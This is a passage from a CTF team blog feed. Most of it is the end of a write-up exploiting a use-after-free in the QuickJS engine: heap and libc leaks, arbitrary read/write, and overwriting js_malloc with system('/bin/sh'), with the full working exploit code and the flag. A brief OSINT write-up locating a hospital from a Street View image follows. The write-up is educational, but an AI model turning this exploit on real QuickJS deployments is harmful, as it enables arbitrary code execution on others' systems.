<p>Now, we can write into <code class="language-plaintext highlighter-rouge">uaf_arr</code> and edit the object metadata of <code class="language-plaintext highlighter-rouge">arr</code> as we wish:</p>

<div class="language-js highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1">// set fake object metadata for 'arr'</span>
<span class="nx">uaf_arr</span><span class="p">[</span><span class="mi">0</span><span class="p">]</span> <span class="o">=</span> <span class="mi">10</span><span class="p">;</span>		<span class="c1">// large refcount to prevent it from being freed by the gc later</span>
<span class="nx">uaf_arr</span><span class="p">[</span><span class="mi">1</span><span class="p">]</span> <span class="o">=</span> <span class="mh">0x001b0d00</span><span class="p">;</span>	<span class="c1">// class_id of Uint32Array and some flags similar to what uaf_arr has</span>
<span class="nx">uaf_arr</span><span class="p">[</span><span class="mh">0x10</span><span class="p">]</span> <span class="o">=</span> <span class="mh">0x10000000</span><span class="p">;</span>	<span class="c1">// a huge length value (the .u.array.count field of JSObject)</span>
</code></pre></div></div>

<p>Now we can point <code class="language-plaintext highlighter-rouge">arr</code>’s data pointer (<code class="language-plaintext highlighter-rouge">.u.array.u.ptr</code> field) to any arbitrary location by editing its value through <code class="language-plaintext highlighter-rouge">uaf_arr</code>, and then read or write that location by accessing <code class="language-plaintext highlighter-rouge">arr[0]</code>. However, we don’t have any kind of leak yet, so we don’t know what address to write there. The memory of <code class="language-plaintext highlighter-rouge">uaf_arr</code> is also zeroed out when it’s re-allocated, so we can’t find any pointers there.</p>
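<p>Since a <code class="language-plaintext highlighter-rouge">Uint32Array</code> holds 4-byte elements, a 64-bit pointer has to be written as two consecutive elements, low half first on a little-endian machine. The helper below is a sketch of that split; <code class="language-plaintext highlighter-rouge">writePointer</code>, the demo array and the address are all hypothetical, and it uses BigInt for clarity.</p>

<pre><code class="language-js">// Split a 64-bit address (BigInt) into two dwords and store them low half first.
// dwordIndex * 4 is the byte offset of the pointer inside the overlapped struct.
function writePointer(view, dwordIndex, address) {
  view[dwordIndex] = Number(address % 0x100000000n);      // low 32 bits
  view[dwordIndex + 1] = Number(address / 0x100000000n);  // high 32 bits
}

// Demo on an ordinary array with a made-up address.
const demo = new Uint32Array(4);
writePointer(demo, 2, 0x55d5d5601000n);
console.log(demo[2].toString(16), demo[3].toString(16));  // d5601000 55d5
</code></pre>

<p>Inside a real exploit, creating BigInt values means extra heap allocations that could disturb the layout; the exploit in this write-up keeps the two halves as plain numbers instead.</p>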

<h2 id="getting-leaks">Getting leaks</h2>

<p>To get leaks, I did the same thing that we did to <code class="language-plaintext highlighter-rouge">arr</code>, but this time to a string. If we can cause a <code class="language-plaintext highlighter-rouge">JSString</code> to be freed and then allocate a <code class="language-plaintext highlighter-rouge">Uint32Array</code> whose data pointer points to the <code class="language-plaintext highlighter-rouge">JSString</code> struct memory, we can set the length of the <code class="language-plaintext highlighter-rouge">JSString</code> to some huge value and get an out-of-bounds (OOB) read on the heap through that string.</p>

<div class="language-js highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kd">var</span> <span class="nx">str</span> <span class="o">=</span> <span class="dl">"</span><span class="s2">AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJ</span><span class="dl">"</span><span class="p">;</span>	<span class="c1">// a JSString that occupies an 0x50-sized chunk</span>
<span class="p">...</span>
<span class="k">async</span> <span class="kd">function</span> <span class="nx">fn2</span><span class="p">()</span> <span class="p">{</span>
	<span class="nx">console</span><span class="p">.</span><span class="nx">log</span><span class="p">(</span><span class="dl">"</span><span class="s2">fn2</span><span class="dl">"</span><span class="p">);</span>
	<span class="k">return</span> <span class="nx">str</span><span class="p">;</span>
<span class="p">}</span>
<span class="p">...</span>
<span class="nx">fn1</span><span class="p">().</span><span class="nx">then</span><span class="p">(()</span> <span class="o">=&gt;</span> <span class="p">{</span>
	<span class="nx">fn1</span><span class="p">().</span><span class="nx">then</span><span class="p">(()</span> <span class="o">=&gt;</span> <span class="p">{</span>
		<span class="p">...</span>
		<span class="c1">// do stuff related to causing UAF for 'arr'</span>
		<span class="p">...</span>
		<span class="nx">fn2</span><span class="p">().</span><span class="nx">then</span><span class="p">(()</span> <span class="o">=&gt;</span> <span class="p">{</span>
			<span class="nx">fn2</span><span class="p">().</span><span class="nx">then</span><span class="p">(()</span> <span class="o">=&gt;</span> <span class="p">{</span>
				<span class="c1">// 'str' gets freed here while we still have a reference to it.</span>

				<span class="c1">// allocate more objects to bring str's freed memory near the top of tcachebin</span>
				<span class="k">for</span> <span class="p">(</span><span class="kd">let</span> <span class="nx">i</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="nx">i</span> <span class="o">&lt;</span> <span class="mi">6</span><span class="p">;</span> <span class="nx">i</span><span class="o">++</span><span class="p">)</span> <span class="p">{</span>
					<span class="nx">objs</span><span class="p">.</span><span class="nx">push</span><span class="p">({</span><span class="na">a</span><span class="p">:</span> <span class="mi">1</span><span class="p">});</span>
				<span class="p">}</span>

				<span class="c1">// allocate a typed array with its data pointer pointing to str's freed memory (freed JSString struct)</span>
				<span class="kd">var</span> <span class="nx">uaf_str_arr</span> <span class="o">=</span> <span class="k">new</span> <span class="nb">Uint32Array</span><span class="p">(</span><span class="mi">18</span><span class="p">);</span>

				<span class="c1">// set metadata of the JSString struct</span>
				<span class="nx">uaf_str_arr</span><span class="p">[</span><span class="mi">0</span><span class="p">]</span> <span class="o">=</span> <span class="mi">2</span><span class="p">;</span>	<span class="c1">// nonzero refcount to avoid it getting freed by gc</span>
				<span class="nx">uaf_str_arr</span><span class="p">[</span><span class="mi">1</span><span class="p">]</span> <span class="o">=</span> <span class="mh">0x10000000</span><span class="p">;</span>	<span class="c1">// huge length</span>
				<span class="nx">uaf_str_arr</span><span class="p">[</span><span class="mi">2</span><span class="p">]</span> <span class="o">=</span> <span class="mh">0x497f93b1</span><span class="p">;</span>	<span class="c1">// some metadata I copied from original 'str'</span>
				<span class="nx">uaf_str_arr</span><span class="p">[</span><span class="mi">3</span><span class="p">]</span> <span class="o">=</span> <span class="mh">0x4b</span><span class="p">;</span>			<span class="c1">// some metadata I copied from original 'str'</span>
				
				<span class="p">...</span>
			<span class="p">});</span>
		<span class="p">});</span>
	<span class="p">});</span>
<span class="p">});</span>
</code></pre></div></div>

<p>This follows exactly the same process as exploiting <code class="language-plaintext highlighter-rouge">arr</code>. You just have to adjust the size of the initial content of <code class="language-plaintext highlighter-rouge">str</code> so that its <code class="language-plaintext highlighter-rouge">JSString</code> struct is allocated in an 0x50-sized chunk, so that allocating <code class="language-plaintext highlighter-rouge">{a: 1}</code> objects draws from the same malloc free list.</p>

<p>Now that we can read stuff from the heap, I wrote a helper function to read a dword from the heap:</p>

<div class="language-js highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kd">const</span> <span class="nx">read_dword</span> <span class="o">=</span> <span class="p">(</span><span class="nx">offset</span><span class="p">)</span> <span class="o">=&gt;</span> <span class="p">{</span>
	<span class="kd">let</span> <span class="nx">result</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
	<span class="k">for</span> <span class="p">(</span><span class="kd">let</span> <span class="nx">i</span> <span class="o">=</span> <span class="mi">3</span><span class="p">;</span> <span class="nx">i</span> <span class="o">&gt;=</span> <span class="mi">0</span><span class="p">;</span> <span class="nx">i</span><span class="o">--</span><span class="p">)</span> <span class="p">{</span>
		<span class="nx">result</span> <span class="o">=</span> <span class="p">(</span><span class="nx">result</span> <span class="o">&lt;&lt;</span> <span class="mi">8</span><span class="p">)</span> <span class="o">|</span> <span class="nx">str</span><span class="p">.</span><span class="nx">charCodeAt</span><span class="p">(</span><span class="nx">offset</span> <span class="o">+</span> <span class="nx">i</span><span class="p">);</span>
	<span class="p">}</span>
	<span class="k">return</span> <span class="nx">result</span><span class="p">;</span>
<span class="p">};</span>
</code></pre></div></div>

<p>Then, I set a breakpoint and used the <code class="language-plaintext highlighter-rouge">tel</code> gdb command to inspect the pointers that come after <code class="language-plaintext highlighter-rouge">str</code>’s buffer on the heap. I found one pointer at a constant offset from the libc base and another at a constant offset from the heap base, and used these to leak the libc and heap bases.</p>
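<p>Each leaked pointer arrives as two 32-bit halves, and the shifts in <code class="language-plaintext highlighter-rouge">read_dword</code> produce a signed 32-bit result, so a half with its top bit set comes back negative. The sketch below shows one way to rebuild the full 64-bit value and subtract a constant offset. <code class="language-plaintext highlighter-rouge">combineDwords</code> and the leaked values are hypothetical; the <code class="language-plaintext highlighter-rouge">0xd60</code> offset is the one used for the heap base in the final exploit.</p>

<pre><code class="language-js">// Rebuild a 64-bit pointer from two 32-bit halves that may be negative numbers.
function combineDwords(low, high) {
  const lo = BigInt.asUintN(32, BigInt(low));   // reinterpret as unsigned 32-bit
  const hi = BigInt.asUintN(32, BigInt(high));
  return hi * 0x100000000n + lo;
}

// Made-up leak: the low half has its top bit set, so it shows up as a negative number.
const leakedLow = 0xd5601d60 | 0;
const leakedHigh = 0x55d5;

const leakedPointer = combineDwords(leakedLow, leakedHigh);
const heapBase = leakedPointer - 0xd60n;        // constant offset from the heap base
console.log(leakedPointer.toString(16));        // 55d5d5601d60
console.log(heapBase.toString(16));             // 55d5d5601000
</code></pre>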

<h2 id="getting-rce">Getting RCE</h2>

<p>The <code class="language-plaintext highlighter-rouge">JSContext *ctx</code> that gets passed as the first argument to many js functions has a field named <code class="language-plaintext highlighter-rouge">rt</code>, which is a pointer to a <code class="language-plaintext highlighter-rouge">JSRuntime</code>. <code class="language-plaintext highlighter-rouge">JSRuntime</code> in turn has a field <code class="language-plaintext highlighter-rouge">JSMallocFunctions mf</code> and another one, <code class="language-plaintext highlighter-rouge">JSMallocState malloc_state</code>. <code class="language-plaintext highlighter-rouge">mf</code> has 4 function pointers, the first of which is <code class="language-plaintext highlighter-rouge">js_malloc</code>. Its signature shows that its first argument is a <code class="language-plaintext highlighter-rouge">JSMallocState *</code>. So, if we can overwrite the <code class="language-plaintext highlighter-rouge">ctx-&gt;rt-&gt;mf.js_malloc</code> function pointer with <code class="language-plaintext highlighter-rouge">system()</code> and write <code class="language-plaintext highlighter-rouge">"/bin/sh"</code> at <code class="language-plaintext highlighter-rouge">&amp;(ctx-&gt;rt-&gt;malloc_state)</code>, we will be able to call <code class="language-plaintext highlighter-rouge">system("/bin/sh")</code> by triggering <code class="language-plaintext highlighter-rouge">js_malloc</code>. Just before doing that, I set the <code class="language-plaintext highlighter-rouge">shape</code> field of <code class="language-plaintext highlighter-rouge">arr</code>’s object metadata to point to the middle of an area near the base of the heap that seemed to contain only zeros.
This prevents segfaults in the inlined function <code class="language-plaintext highlighter-rouge">find_own_property</code>, which is called by <code class="language-plaintext highlighter-rouge">JS_SetPropertyInternal</code>, the function used for writing to an index of <code class="language-plaintext highlighter-rouge">arr</code>. In the end, allocating any object will trigger <code class="language-plaintext highlighter-rouge">js_malloc</code> and give us a shell. This is the final part of the exploit:</p>

<div class="language-js highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1">// leak the heap base low and high dwords by reading them from the heap</span>
<span class="kd">let</span> <span class="nx">heap_base_high</span> <span class="o">=</span> <span class="nx">read_dword</span><span class="p">(</span><span class="mh">0x54</span><span class="p">);</span>
<span class="kd">let</span> <span class="nx">heap_base_low</span> <span class="o">=</span> <span class="nx">read_dword</span><span class="p">(</span><span class="mh">0x50</span><span class="p">)</span> <span class="o">-</span> <span class="mh">0xd60</span><span class="p">;</span>
<span class="nx">console</span><span class="p">.</span><span class="nx">log</span><span class="p">(</span><span class="nx">heap_base_high</span><span class="p">.</span><span class="nx">toString</span><span class="p">(</span><span class="mi">16</span><span class="p">));</span>
<span class="nx">console</span><span class="p">.</span><span class="nx">log</span><span class="p">(</span><span class="nx">heap_base_low</span><span class="p">.</span><span class="nx">toString</span><span class="p">(</span><span class="mi">16</span><span class="p">));</span>

<span class="c1">// set the 'shape' property of 'arr' to the middle of an area with zeros.</span>
<span class="c1">// this will prevent segfaults in find_own_property which is an inlined function called</span>
<span class="c1">// by JS_SetPropertyInternal when performing writes to an index of arr</span>
<span class="nx">uaf_arr</span><span class="p">[</span><span class="mi">6</span><span class="p">]</span> <span class="o">=</span> <span class="nx">heap_base_low</span> <span class="o">+</span> <span class="mh">0x200</span><span class="p">;</span>
<span class="nx">uaf_arr</span><span class="p">[</span><span class="mi">7</span><span class="p">]</span> <span class="o">=</span> <span class="nx">heap_base_high</span><span class="p">;</span>

<span class="c1">// set the data pointer of arr to point to the heap base</span>
<span class="nx">uaf_arr</span><span class="p">[</span><span class="mh">0xe</span><span class="p">]</span> <span class="o">=</span> <span class="nx">heap_base_low</span><span class="p">;</span>
<span class="nx">uaf_arr</span><span class="p">[</span><span class="mh">0xf</span><span class="p">]</span> <span class="o">=</span> <span class="nx">heap_base_high</span><span class="p">;</span>

<span class="c1">// leak (main_arena+96), which is a libc address, by reading it off the heap</span>
<span class="kd">let</span> <span class="nx">libc_leak_low</span> <span class="o">=</span> <span class="nx">read_dword</span><span class="p">(</span><span class="mh">0x100</span><span class="p">);</span>
<span class="kd">let</span> <span class="nx">libc_leak_high</span> <span class="o">=</span> <span class="nx">read_dword</span><span class="p">(</span><span class="mh">0x104</span><span class="p">);</span>
<span class="nx">console</span><span class="p">.</span><span class="nx">log</span><span class="p">(</span><span class="nx">libc_leak_high</span><span class="p">.</span><span class="nx">toString</span><span class="p">(</span><span class="mi">16</span><span class="p">));</span>
<span class="nx">console</span><span class="p">.</span><span class="nx">log</span><span class="p">(</span><span class="nx">libc_leak_low</span><span class="p">.</span><span class="nx">toString</span><span class="p">(</span><span class="mi">16</span><span class="p">));</span>

<span class="c1">// Math.min(uaf_arr);</span>

<span class="c1">// set ctx-&gt;rt-&gt;mf.js_malloc to system()</span>
<span class="nx">arr</span><span class="p">[</span><span class="mh">0xa8</span><span class="p">]</span> <span class="o">=</span> <span class="nx">libc_leak_low</span> <span class="o">-</span> <span class="mh">0x1a9a50</span><span class="p">;</span>	<span class="c1">// libc-dependent offset</span>
<span class="nx">arr</span><span class="p">[</span><span class="mh">0xa9</span><span class="p">]</span> <span class="o">=</span> <span class="nx">libc_leak_high</span><span class="p">;</span>

<span class="c1">// write "/bin/sh\0" at ctx-&gt;rt-&gt;malloc_state's location, which gets passed to js_malloc as the first argument</span>
<span class="nx">arr</span><span class="p">[</span><span class="mh">0xb0</span><span class="p">]</span> <span class="o">=</span> <span class="mh">0x6e69622f</span><span class="p">;</span>
<span class="nx">arr</span><span class="p">[</span><span class="mh">0xb1</span><span class="p">]</span> <span class="o">=</span> <span class="mh">0x0068732f</span><span class="p">;</span>

<span class="c1">// trigger js_malloc, which will now do system("/bin/sh")</span>
<span class="kd">var</span> <span class="nx">x</span> <span class="o">=</span> <span class="p">{</span><span class="na">a</span><span class="p">:</span> <span class="mi">1</span><span class="p">};</span>
</code></pre></div></div>
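<p>The two constants written for <code class="language-plaintext highlighter-rouge">"/bin/sh\0"</code> are simply the string’s bytes packed into little-endian 32-bit values. A small sketch of that packing follows; the helper name <code class="language-plaintext highlighter-rouge">packLittleEndianDwords</code> is hypothetical, and it assumes every character fits in one byte.</p>

<pre><code class="language-js">// Pack a byte string into little-endian 32-bit values, zero-padded to a multiple of 4.
function packLittleEndianDwords(text) {
  const bytes = Array.from(text, function (ch) { return ch.charCodeAt(0); });
  while (bytes.length % 4 !== 0) {
    bytes.push(0);
  }
  const dwords = [];
  for (let i = 0; i !== bytes.length; i += 4) {
    // The lowest-addressed byte becomes the least significant byte.
    dwords.push(bytes[i] + bytes[i + 1] * 0x100 + bytes[i + 2] * 0x10000 + bytes[i + 3] * 0x1000000);
  }
  return dwords;
}

const shellPath = packLittleEndianDwords("/bin/sh\0");
console.log(shellPath.map(function (d) { return d.toString(16); }));  // [ '6e69622f', '68732f' ]
</code></pre>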

<p>Something that I found out only while writing this writeup and commenting my exploit is that even writing too many comments in the exploit code can mess up the heap layout and break the exploit. This is probably expected, because the JS source code seems to be allocated on the heap as well, so changing the size of the source too much can affect the heap layout. Basically, it’s very fragile but at least it’s deterministic :)</p>

<h2 id="full-exploit">Full exploit</h2>

<p>And the full final exploit code:</p>

<div class="language-js highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kd">var</span> <span class="nx">arr</span> <span class="o">=</span> <span class="k">new</span> <span class="nb">Uint32Array</span><span class="p">(</span><span class="mh">0x140</span><span class="p">);</span>
<span class="kd">var</span> <span class="nx">str</span> <span class="o">=</span> <span class="dl">"</span><span class="s2">AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJ</span><span class="dl">"</span><span class="p">;</span>
<span class="kd">var</span> <span class="nx">uaf_arr</span><span class="p">;</span>
<span class="kd">var</span> <span class="nx">objs</span><span class="p">;</span>

<span class="k">async</span> <span class="kd">function</span> <span class="nx">fn1</span><span class="p">()</span> <span class="p">{</span>
	<span class="nx">console</span><span class="p">.</span><span class="nx">log</span><span class="p">(</span><span class="dl">"</span><span class="s2">fn1</span><span class="dl">"</span><span class="p">);</span>
	<span class="k">return</span> <span class="nx">arr</span><span class="p">;</span>
<span class="p">}</span>

<span class="k">async</span> <span class="kd">function</span> <span class="nx">fn2</span><span class="p">()</span> <span class="p">{</span>
	<span class="nx">console</span><span class="p">.</span><span class="nx">log</span><span class="p">(</span><span class="dl">"</span><span class="s2">fn2</span><span class="dl">"</span><span class="p">);</span>
	<span class="k">return</span> <span class="nx">str</span><span class="p">;</span>
<span class="p">}</span>

<span class="nx">fn1</span><span class="p">().</span><span class="nx">then</span><span class="p">(()</span> <span class="o">=&gt;</span> <span class="p">{</span>
	<span class="nx">fn1</span><span class="p">().</span><span class="nx">then</span><span class="p">(()</span> <span class="o">=&gt;</span> <span class="p">{</span>
		<span class="nx">objs</span> <span class="o">=</span> <span class="p">[];</span>
		<span class="k">for</span> <span class="p">(</span><span class="kd">let</span> <span class="nx">i</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="nx">i</span> <span class="o">&lt;</span> <span class="mi">6</span><span class="p">;</span> <span class="nx">i</span><span class="o">++</span><span class="p">)</span> <span class="p">{</span>
			<span class="nx">objs</span><span class="p">.</span><span class="nx">push</span><span class="p">({</span><span class="na">a</span><span class="p">:</span> <span class="mi">1</span><span class="p">});</span>
		<span class="p">}</span>

		<span class="nx">uaf_arr</span> <span class="o">=</span> <span class="k">new</span> <span class="nb">Uint32Array</span><span class="p">(</span><span class="mi">18</span><span class="p">);</span>

		<span class="nx">uaf_arr</span><span class="p">[</span><span class="mi">0</span><span class="p">]</span> <span class="o">=</span> <span class="mi">10</span><span class="p">;</span>
		<span class="nx">uaf_arr</span><span class="p">[</span><span class="mi">1</span><span class="p">]</span> <span class="o">=</span> <span class="mh">0x001b0d00</span><span class="p">;</span>
		<span class="nx">uaf_arr</span><span class="p">[</span><span class="mh">0x10</span><span class="p">]</span> <span class="o">=</span> <span class="mh">0x10000000</span><span class="p">;</span>

		<span class="nx">fn2</span><span class="p">().</span><span class="nx">then</span><span class="p">(()</span> <span class="o">=&gt;</span> <span class="p">{</span>
			<span class="nx">fn2</span><span class="p">().</span><span class="nx">then</span><span class="p">(()</span> <span class="o">=&gt;</span> <span class="p">{</span>
				<span class="k">for</span> <span class="p">(</span><span class="kd">let</span> <span class="nx">i</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="nx">i</span> <span class="o">&lt;</span> <span class="mi">6</span><span class="p">;</span> <span class="nx">i</span><span class="o">++</span><span class="p">)</span> <span class="p">{</span>
					<span class="nx">objs</span><span class="p">.</span><span class="nx">push</span><span class="p">({</span><span class="na">a</span><span class="p">:</span> <span class="mi">1</span><span class="p">});</span>
				<span class="p">}</span>

				<span class="kd">var</span> <span class="nx">uaf_str_arr</span> <span class="o">=</span> <span class="k">new</span> <span class="nb">Uint32Array</span><span class="p">(</span><span class="mi">18</span><span class="p">);</span>

				<span class="nx">uaf_str_arr</span><span class="p">[</span><span class="mi">0</span><span class="p">]</span> <span class="o">=</span> <span class="mi">2</span><span class="p">;</span>
				<span class="nx">uaf_str_arr</span><span class="p">[</span><span class="mi">1</span><span class="p">]</span> <span class="o">=</span> <span class="mh">0x10000000</span><span class="p">;</span>
				<span class="nx">uaf_str_arr</span><span class="p">[</span><span class="mi">2</span><span class="p">]</span> <span class="o">=</span> <span class="mh">0x497f93b1</span><span class="p">;</span>
				<span class="nx">uaf_str_arr</span><span class="p">[</span><span class="mi">3</span><span class="p">]</span> <span class="o">=</span> <span class="mh">0x4b</span><span class="p">;</span>

				<span class="kd">const</span> <span class="nx">read_dword</span> <span class="o">=</span> <span class="p">(</span><span class="nx">offset</span><span class="p">)</span> <span class="o">=&gt;</span> <span class="p">{</span>
					<span class="kd">let</span> <span class="nx">result</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
					<span class="k">for</span> <span class="p">(</span><span class="kd">let</span> <span class="nx">i</span> <span class="o">=</span> <span class="mi">3</span><span class="p">;</span> <span class="nx">i</span> <span class="o">&gt;=</span> <span class="mi">0</span><span class="p">;</span> <span class="nx">i</span><span class="o">--</span><span class="p">)</span> <span class="p">{</span>
						<span class="nx">result</span> <span class="o">=</span> <span class="p">(</span><span class="nx">result</span> <span class="o">&lt;&lt;</span> <span class="mi">8</span><span class="p">)</span> <span class="o">|</span> <span class="nx">str</span><span class="p">.</span><span class="nx">charCodeAt</span><span class="p">(</span><span class="nx">offset</span> <span class="o">+</span> <span class="nx">i</span><span class="p">);</span>
					<span class="p">}</span>
					<span class="k">return</span> <span class="nx">result</span><span class="p">;</span>
				<span class="p">};</span>

				<span class="kd">let</span> <span class="nx">heap_base_high</span> <span class="o">=</span> <span class="nx">read_dword</span><span class="p">(</span><span class="mh">0x54</span><span class="p">);</span>
				<span class="kd">let</span> <span class="nx">heap_base_low</span> <span class="o">=</span> <span class="nx">read_dword</span><span class="p">(</span><span class="mh">0x50</span><span class="p">)</span> <span class="o">-</span> <span class="mh">0xd60</span><span class="p">;</span>
				<span class="nx">console</span><span class="p">.</span><span class="nx">log</span><span class="p">(</span><span class="nx">heap_base_high</span><span class="p">.</span><span class="nx">toString</span><span class="p">(</span><span class="mi">16</span><span class="p">));</span>
				<span class="nx">console</span><span class="p">.</span><span class="nx">log</span><span class="p">(</span><span class="nx">heap_base_low</span><span class="p">.</span><span class="nx">toString</span><span class="p">(</span><span class="mi">16</span><span class="p">));</span>

				<span class="nx">uaf_arr</span><span class="p">[</span><span class="mi">6</span><span class="p">]</span> <span class="o">=</span> <span class="nx">heap_base_low</span> <span class="o">+</span> <span class="mh">0x200</span><span class="p">;</span>
				<span class="nx">uaf_arr</span><span class="p">[</span><span class="mi">7</span><span class="p">]</span> <span class="o">=</span> <span class="nx">heap_base_high</span><span class="p">;</span>

				<span class="nx">uaf_arr</span><span class="p">[</span><span class="mh">0xe</span><span class="p">]</span> <span class="o">=</span> <span class="nx">heap_base_low</span><span class="p">;</span>
				<span class="nx">uaf_arr</span><span class="p">[</span><span class="mh">0xf</span><span class="p">]</span> <span class="o">=</span> <span class="nx">heap_base_high</span><span class="p">;</span>

				<span class="kd">let</span> <span class="nx">libc_leak_low</span> <span class="o">=</span> <span class="nx">read_dword</span><span class="p">(</span><span class="mh">0x100</span><span class="p">);</span>
				<span class="kd">let</span> <span class="nx">libc_leak_high</span> <span class="o">=</span> <span class="nx">read_dword</span><span class="p">(</span><span class="mh">0x104</span><span class="p">);</span>
				<span class="nx">console</span><span class="p">.</span><span class="nx">log</span><span class="p">(</span><span class="nx">libc_leak_high</span><span class="p">.</span><span class="nx">toString</span><span class="p">(</span><span class="mi">16</span><span class="p">));</span>
				<span class="nx">console</span><span class="p">.</span><span class="nx">log</span><span class="p">(</span><span class="nx">libc_leak_low</span><span class="p">.</span><span class="nx">toString</span><span class="p">(</span><span class="mi">16</span><span class="p">));</span>

				<span class="nx">arr</span><span class="p">[</span><span class="mh">0xa8</span><span class="p">]</span> <span class="o">=</span> <span class="nx">libc_leak_low</span> <span class="o">-</span> <span class="mh">0x1a9a50</span><span class="p">;</span>
				<span class="nx">arr</span><span class="p">[</span><span class="mh">0xa9</span><span class="p">]</span> <span class="o">=</span> <span class="nx">libc_leak_high</span><span class="p">;</span>

				<span class="nx">arr</span><span class="p">[</span><span class="mh">0xb0</span><span class="p">]</span> <span class="o">=</span> <span class="mh">0x6e69622f</span><span class="p">;</span>
				<span class="nx">arr</span><span class="p">[</span><span class="mh">0xb1</span><span class="p">]</span> <span class="o">=</span> <span class="mh">0x0068732f</span><span class="p">;</span>

				<span class="kd">var</span> <span class="nx">x</span> <span class="o">=</span> <span class="p">{</span><span class="na">a</span><span class="p">:</span> <span class="mi">1</span><span class="p">};</span>
			<span class="p">});</span>
		<span class="p">});</span>
	<span class="p">});</span>
<span class="p">});</span>
</code></pre></div></div>
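
<p>One detail of the arithmetic above: the offsets are added to or subtracted from the low dword only, which is fine as long as the operation does not carry into or borrow from the high dword. The following is a hedged sketch of doing the same arithmetic on the full 64-bit value instead. It is not part of the exploit: <code class="language-plaintext highlighter-rouge">joinDwords</code> and <code class="language-plaintext highlighter-rouge">splitDwords</code> are hypothetical helper names, the leak value is made up, and it assumes the engine supports BigInt:</p>

<div class="language-js highlighter-rouge"><div class="highlight"><pre class="highlight"><code>// Hypothetical helpers (not in the original exploit); assumes BigInt support.
const TWO_32 = 0x100000000n;

// Join the low and high dwords of a leaked pointer into one 64-bit BigInt.
// asUintN(32, ...) reinterprets a negative 32-bit value as unsigned, which
// matters because bitwise operators in JS produce signed 32-bit results.
function joinDwords(low, high) {
	return BigInt.asUintN(32, BigInt(high)) * TWO_32 + BigInt.asUintN(32, BigInt(low));
}

// Split a 64-bit BigInt address back into [low, high] dwords,
// ready to be stored at two consecutive indexes of a Uint32Array.
function splitDwords(addr) {
	return [
		Number(BigInt.asUintN(32, addr)),
		Number(BigInt.asUintN(32, addr / TWO_32)),
	];
}

// Made-up leak, chosen so that subtracting the offset borrows from the high dword.
const leak = joinDwords(0x00100000, 0x7f3a);
const target = splitDwords(leak - 0x1a9a50n);
console.log(target.map(function (d) { return d.toString(16); }).join(" "));
// prints "fff565b0 7f39"
</code></pre></div></div>

<p>With this made-up value, subtracting from the low dword alone would leave the high dword at <code class="language-plaintext highlighter-rouge">0x7f3a</code> instead of <code class="language-plaintext highlighter-rouge">0x7f39</code>. This case should be rare in practice, and adding helpers like these changes the size of the source, so the loop counts in the exploit would likely need re-tuning.</p>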

<p>The flag: <code class="language-plaintext highlighter-rouge">sdctf{i_PrOMlse_7heRe_1S_n0_UniN7end3D_SOlu7i0n_tHl5_tImE}</code></p>]]></content><author><name>sinamhdv</name></author><summary type="html"><![CDATA[Summary: Exploiting UAF due to an incorrect decrement to the reference count of an object in QuickJS Javascript engine to gain arbitrary read/write and leaks and then using that to gain RCE.]]></summary></entry><entry><title type="html">[UMDCTF 2024] Lost on Caladan</title><link href="https://maplebacon.org/2024/05/umdctf2024-lost-on-caladan/" rel="alternate" type="text/html" title="[UMDCTF 2024] Lost on Caladan" 
/><published>2024-05-01T00:00:00+00:00</published><updated>2024-05-01T00:00:00+00:00</updated><id>https://maplebacon.org/2024/05/umdctf2024-lost-on-caladan</id><content type="html" xml:base="https://maplebacon.org/2024/05/umdctf2024-lost-on-caladan/"><![CDATA[<h1 id="lost-on-caladan-500-osint">Lost on Caladan [500] OSINT</h1>

<h2 id="challenge-description">Challenge Description</h2>

<p>you seek to find the finest doctor on caladan. it’s rumored he works at this location. find his name for me.</p>

<h2 id="solution">Solution</h2>

<p>As a Dune enthusiast who has seen both films half a dozen times, I know that the finest doctor on Caladan is Dr. Yueh. However, the CTF server did not accept the flag <code class="language-plaintext highlighter-rouge">UMDCTF{Wellington_Yueh}</code>. Instead, we were provided with a .jpg file of a Google Street View capture (a full 360-degree panoramic view).</p>

<p><img src="/assets/images/umdctf2024/lost-on-caladan.jpg" alt="image" /></p>

<p>The image is a Google Street View capture of what appears to be a medical center.</p>

<p>Let’s try to find cues that identify the macro details of the location, i.e. the country and the administrative division (province, state, city, etc.).</p>

<p>The glaring white-on-red octagonal ‘STOP’ sign tells us that the location is in North America, specifically in an English-speaking territory. Québec, Canada’s predominantly French-speaking province, uses French ‘arrêt’ signage, so we can rule out the possibility of it being in Québec.</p>

<p>Additionally, we can see detailed high-visibility direction signs near the entrance/exit of the parking lot. In North America, medical centers often span multiple buildings, so clear and concise directions are necessary. The signs are presented in high-contrast colors (blue and white or red and white) for visibility, with arrows pointing the way at intersections.</p>

<p><img src="/assets/images/umdctf2024//image-copy-3.png" alt="image" /></p>

<p>or</p>

<p><img src="/assets/images/umdctf2024//image-copy-4.png" alt="image" /></p>

<p>We can conclude that this is a fairly large medical center in the region, possibly with more than 300 beds and with attached out-patient, emergency, rehabilitation, and surgical facilities.</p>

<p>Now let’s look for some other identifiers.</p>

<p>The newsstand by the entrance of the building may provide some insight. Only the text <strong>“amp”</strong> is visible on this newspaper or magazine dispenser.</p>

<p><img src="/assets/images/umdctf2024//image-copy.png" alt="image" /></p>

<p><img src="/assets/images/umdctf2024//image2.png" alt="image" /></p>

<p>We can tentatively conclude that <strong>“amp”</strong> matches the magazine “Arkansas Money &amp; Politics”, which is a local Arkansas publication. This should help us narrow down the search to Arkansas, USA. However, given the size of the state, we start with its largest hospitals by bed count:</p>

<ol>
  <li>Baptist Health Medical Center - Little Rock (834 Beds)</li>
  <li>CHI St. Vincent Infirmary (615 Beds)</li>
  <li>UAMS Medical Center (535 Beds)</li>
</ol>

<p><a href="https://www.hospitalmanagement.net/features/largest-hospitals-arkansas-2021/?cf-view">Source</a>.</p>

<p>The satellite view of Baptist Health Medical Center - Little Rock shows a similar parking lot layout and the same high-visibility direction signs.</p>

<p><img src="/assets/images/umdctf2024//image-copy-5.png" alt="image" /></p>

